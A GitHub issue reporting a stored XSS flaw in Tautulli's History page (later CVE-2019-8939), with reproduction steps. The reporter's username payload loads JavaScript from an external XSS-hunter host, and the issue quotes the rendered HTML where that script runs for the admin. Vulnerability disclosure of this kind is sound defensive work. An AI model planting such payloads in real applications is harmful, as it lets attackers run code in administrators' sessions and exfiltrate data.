Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Insufficient username filtering in history.html allows XSS and data exfiltration #161

Closed
geeknik opened this issue Feb 19, 2019 · 1 comment

Comments

Projects
None yet
2 participants
@geeknik
Copy link

commented Feb 19, 2019

Version:
2.1.26

What you did?
I changed my Plex username to geeknik"><script src=https://zed.xss.ht></script>.

What happened?
Tautulli does not filter out JavaScript when reading usernames and when the admin visits the History page, the JavaScript is executed in the context of said admin.

Lines 112-128 are vulnerable:
https://github.com/Tautulli/Tautulli/blob/56a91de2c4ff0fdd8fbdff4dd7d7677bd16a4b28/data/interfaces/default/history.html#L112

Here we can see how it is reflected:

<label>
     <select name="history-user" id="history-user" class="btn" style="color: inherit;">
     <option value="">All Users</option>
     <option disabled="">────────────</option>
     <option value="xxx">user1</option><option value="xxx">user2</option><option value="xxx">user3</option><option value="xxx">user4</option><option value="xxx">DomitianX</option><option value="xxx">geeknik"&gt;<script src="https://zed.xss.ht"></script></option><option value="xxx">user5</option><option value="xxx">user6</option><option value="xxx">user7</option><option value="xxx">user8</option><option value="0">Local</option><option value="xxx">user9</option><option value="xxx">user10</option><option value="xxx">user11</option><option value="xxx">user12</option><option value="xxx">user13</option><option value="xxx">user14</option><option value="xxx">user15</option><option value="xxx">user16</option><option value="xxx">user17</option></select>
</label>

What you expected?
I didn't expect my friend's Plex server to leak a bunch of information at me.

How can we reproduce your issue?
Setup a Plex Media Server, Install Tautulli, create a normal Plex user account to consume media. Change the user account name to something with JavaScript. Visit the Tautulli History page.

@geeknik

This comment has been minimized.

Copy link
Author

commented Feb 19, 2019

CVE-2019-8939 has been assigned to this flaw by MITRE.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.